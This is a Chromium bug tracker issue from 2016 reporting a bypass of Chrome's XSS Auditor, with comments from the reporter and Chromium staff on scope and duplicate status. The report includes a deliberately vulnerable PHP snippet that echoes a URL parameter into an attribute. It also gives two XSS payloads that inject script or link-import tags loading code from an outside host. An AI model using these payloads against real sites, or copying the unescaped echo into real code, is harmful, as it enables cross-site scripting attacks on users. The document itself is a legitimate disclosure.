New issue
Advanced search Search tips

Issue 608653 link

Starred by 1 user
Status: Duplicate
Owner:
tsepez@chromium.org
Closed: May 2016
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug



Sign in to add a comment

Security: Bypass chrome xss auditor under some conditons

Reported by nohack...@gmail.com, May 3 2016 
VULNERABILITY DETAILS
when there exsits script after an xss injection like <img alt="[injection]" src="x">,and the url scheme is http

for example:
---------------------------------
<img alt="[injection]" src="x">
<script>var a=1;</script>
---------------------------------

php source code:
---------------------------------
<img alt="<?php echo $_GET['x'];?>" src="x">
<script>
var a=1;
</script>
---------------------------------

we can use:
x="><script%20src=https:www.cm3.pw/

to bypass chrome auditor.

it will load https://www.cm3.pw/" as js file

you can also see here:
http://cm3.pw/xss.php?x=%22%3E%3Cscript%20src=https:www.cm3.pw/


VERSION
Chrome Version: 50.0.2661.94 (64-bit)
Operating System: OSX 10.11.X

Comment 1 by nohack...@gmail.com, May 3 2016 

when the url scheme is HTTP,
<img alt="[injection]" src="x"> also has bypass like:

x=1"><link%20rel="import"%20href=https:www.cm3.pw/

need no script after the injection

Comment 2 by f...@chromium.org, May 6 2016

Components: Blink>SecurityFeature
Owner: tsepez@chromium.org
tsepez@, what's in/out of scope for the XSS auditor? I notice we get a lot of these, it might be good to add to the sheriff docs or FAQ.
Project Member

Comment 3 by ClusterFuzz, May 6 2016

Status: Assigned (was: Unconfirmed)

Comment 4 by f...@chromium.org, May 10 2016 

tom, ping, can you please take a look at this one too?

Comment 5 by mbarbe...@chromium.org, May 10 2016

Labels: -Type-Bug-Security -Restrict-View-SecurityTeam Type-Bug
Thanks for the report. We don't usually track XSS auditor bypasses as security vulnerabilities, but this may still be a bug.

Comment 6 by nohack...@gmail.com, May 11 2016 

alright,thanks for your paying attention on my issue again

Comment 7 by tsepez@chromium.org, May 11 2016

Status: WontFix (was: Assigned)
We give a pass to same-origin scripts to cut down on the XSSAuditor false positive rate.  If you try injecting a script from a different origin, and it is still not caught, then feel free to re-open the bug.

Comment 8 by nohack...@gmail.com, May 19 2016 

well I don't think the same-origin limit works on my POC
"
<img alt="[injection]" src="x"> also has bypass like:

x=1"><link%20rel="import"%20href=https:www.cm3.pw/

"

you can test it

Comment 9 by tsepez@chromium.org, May 19 2016

Mergedinto: 613123
Status: Duplicate (was: WontFix)
Yup. Got another report.  Thanks.

Comment 10 by nohack...@gmail.com, May 20 2016 

23333

Comment 11 by phith0n....@gmail.com, Dec 8 2016 

Is this bug already fixed?

Comment 12 by nohack...@gmail.com, Dec 8 2016 

I don't think so, 
to my disappointment it was duplicated to another one reported even later than mine.
And I have no permission to access this one id=`613123`.
But anyway,I'd like to 膜 teacher P at this place 0.0!

Comment 13 by tsepez@chromium.org, Dec 8 2016 

Sorry about the "duplicate to later", result of misdiagnosing this original issue and having the second report come in.

Comment 14 by nohack...@gmail.com, Dec 8 2016 

Never mind , thank you

Sign in to add a comment